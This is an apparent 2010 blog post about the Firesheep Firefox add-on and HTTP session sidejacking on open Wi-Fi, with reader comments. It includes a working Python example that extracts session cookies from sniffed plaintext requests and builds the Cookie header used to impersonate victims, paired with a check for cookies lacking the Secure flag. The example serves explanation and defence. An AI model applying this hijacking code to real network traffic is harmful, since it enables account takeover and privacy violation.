Wednesday, 27 October 2010

Firefox Add-On Can Hijack Facebook, Twitter

A freelance software developer has released a Firefox plug-in that lets its user capture session cookies from an open Wi-Fi network and use them to hijack other people's accounts.
On Monday at the ToorCon 12 security conference, Seattle-based freelance software developer Eric Butler announced the release of Firesheep, a Firefox plug-in that lets a user scan an open Wi-Fi network and take over another user's logged-in session on Twitter, Facebook and many other websites.
According to Butler, the plug-in was created to show how popular websites still leave users exposed despite their "privacy" feature upgrades.
"It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else," he said. "This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called 'sidejacking') is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy."
Butler suggested that it was pointless to roll out new privacy features when someone can take over the account by accessing cookies. He said that the only real way to resolve the issue is for Facebook and other sites to offer full end-to-end encryption via HTTPS or SSL. "When it comes to user privacy, SSL is the elephant in the room," he added.
Firesheep appears frighteningly simple. After installation, the user sees a new sidebar on the left of the Firefox window containing a "Start Capturing" button to press once connected to an open network. Whenever another, unsuspecting user on that network visits a website Firesheep knows to be insecure, the plug-in lists that person's name and photo under the button. The Firesheep user can then click the name and is logged in as that person.
Firesheep can currently be downloaded here for Windows and OS X; Windows users, however, need to install WinPcap first.
On Tuesday Butler said that Firesheep had become the #10 trending search on Google in the U.S. The plug-in had also been downloaded 129,000 times in the preceding twenty-four hours and had become one of the "Top Tweets" on Twitter. "I've received a ton of great messages from people who are happy that this issue has finally received widespread attention, so after day one I'm happy with the result," he said.
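To make the mechanism concrete, here is an added example written for this page (it is not Firesheep's own source, which is a Firefox extension, nor code from any of the sites named above). It models Firesheep's idea of per-site "handlers": a table mapping a host to the cookie names that together carry a login session, applied to plaintext HTTP requests as a sniffer would see them on an open network. The host names, cookie names and packet payloads are constructed for the example and are not the real 2010 cookies of Facebook or Twitter. A second function shows the defender's check that follows from Butler's point: any cookie set without the Secure attribute is one the browser will also send over plaintext HTTP.

```python
import re
from dataclasses import dataclass, field

# Handler table in the spirit of Firesheep's per-site handlers (assumed
# hosts and cookie names for illustration, not real site cookies).
HANDLERS = {
    "www.example-social.test": ("example-social", ("c_user", "xs")),
    "example-micro.test": ("example-micro", ("_session_id",)),
}

REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")


@dataclass
class HijackedSession:
    site: str
    host: str
    cookies: dict = field(default_factory=dict)

    def cookie_header(self) -> str:
        # The exact Cookie header a sidejacker replays to impersonate the victim.
        return "; ".join(f"{k}={v}" for k, v in self.cookies.items())


def parse_http_request(payload: bytes):
    """Return (host, {cookie: value}) for a plaintext HTTP request, else None.

    Anything without a well-formed request line (TLS records, other binary
    traffic) is rejected; encrypted sessions never reach the handler table.
    """
    head = payload.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("iso-8859-1", errors="replace").split("\r\n")
    if not lines or not REQUEST_LINE.match(lines[0]):
        return None
    host, cookies = None, {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value.lower()
        elif name == "cookie":
            for pair in value.split(";"):
                k, eq, v = pair.strip().partition("=")
                if eq:
                    cookies[k] = v
    return host, cookies


def sidejack(packets):
    """Yield one HijackedSession per victim whose request carries the full
    session-cookie set of a handled site (repeats are collapsed, much as
    Firesheep's sidebar shows one entry per captured user)."""
    seen = set()
    for payload in packets:
        parsed = parse_http_request(payload)
        if parsed is None:
            continue
        host, cookies = parsed
        handler = HANDLERS.get(host)
        if handler is None:
            continue
        site, needed = handler
        if not all(n in cookies for n in needed):
            continue  # a partial cookie set is not a usable session
        key = (site, tuple(cookies[n] for n in needed))
        if key in seen:
            continue
        seen.add(key)
        yield HijackedSession(site, host, {n: cookies[n] for n in needed})


def insecure_cookies(response: bytes):
    """Defender's check: cookie names a server sets WITHOUT the Secure
    attribute, i.e. cookies the browser will also send over plain HTTP."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", errors="replace")
    weak = []
    for line in head.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            attrs = [a.strip() for a in value.split(";")]
            if not any(a.lower() == "secure" for a in attrs[1:]):
                weak.append(attrs[0].partition("=")[0])
    return weak


# Constructed payloads standing in for what libpcap/WinPcap would hand the
# capture thread: two requests from the same victim, one without a session,
# one TLS ClientHello (opaque to the sniffer), and one unhandled host.
SAMPLE_PACKETS = [
    b"GET /home.php HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: c_user=100001234; xs=abc123def456; locale=en_US\r\n\r\n",
    b"GET /photos HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: c_user=100001234; xs=abc123def456\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: www.example-social.test\r\n\r\n",
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03\x00\x00",
    b"GET /timeline HTTP/1.1\r\nHost: example-micro.test\r\n"
    b"Cookie: _session_id=9f8e7d6c\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: unhandled.test\r\nCookie: a=b\r\n\r\n",
]

# Constructed response: one session cookie marked Secure, one not.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: c_user=100001234; Path=/; HttpOnly\r\n"
    b"Set-Cookie: xs=abc123def456; Path=/; Secure; HttpOnly\r\n\r\n"
)


def captured_sessions(packets=SAMPLE_PACKETS):
    return list(sidejack(packets))


if __name__ == "__main__":
    for s in captured_sessions():
        print(f"{s.site} via {s.host}: Cookie: {s.cookie_header()}")
    print("cookies sent over plain HTTP:", insecure_cookies(SAMPLE_RESPONSE))
```

Against the constructed capture the sniffer reports two usable sessions and ignores the cookieless request, the TLS record and the unhandled host; the response check flags `c_user`, which is exactly the kind of cookie that makes "encrypt only the login" insufficient.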

21 comments:

  1. WHOA, that's pretty crazy. WPA with a hex is the way to go! :p
  2. I have heard of this before, but it's kinda nice to know how it works, thanks man
  3. Exactly why I disable all my Firefox addons.

    Nice blog, followed ;) Come follow mine :)
  4. I've been reading about this guy, nice defamation of character hack. :D
  5. I read about this. I am surprised that it is so easy to access other people's accounts.
  6. I will download this add-on :D
  7. Wow, is there a way to fix this security hole?
  8. Yup, smart people use Chrome
  9. Wow really??? Thanks for the info man.
  10. This is just the renewal of old school applications like Wireshark and Ethereal. Nothing that wasn't already possible, just employs more GUI.
  11. Is there anything Firefox add-ons can't do?
  12. My Facebook account got hijacked and they won't let me log in anymore unless I recognize a random set of friends I have, half of whom I don't know very well. It seems like Facebook is offering me several friends a day I don't even know. Though I'm smart enough not to add them on my new FB. I did have a wireless modem at the time, but it must be hard to get in? idk.....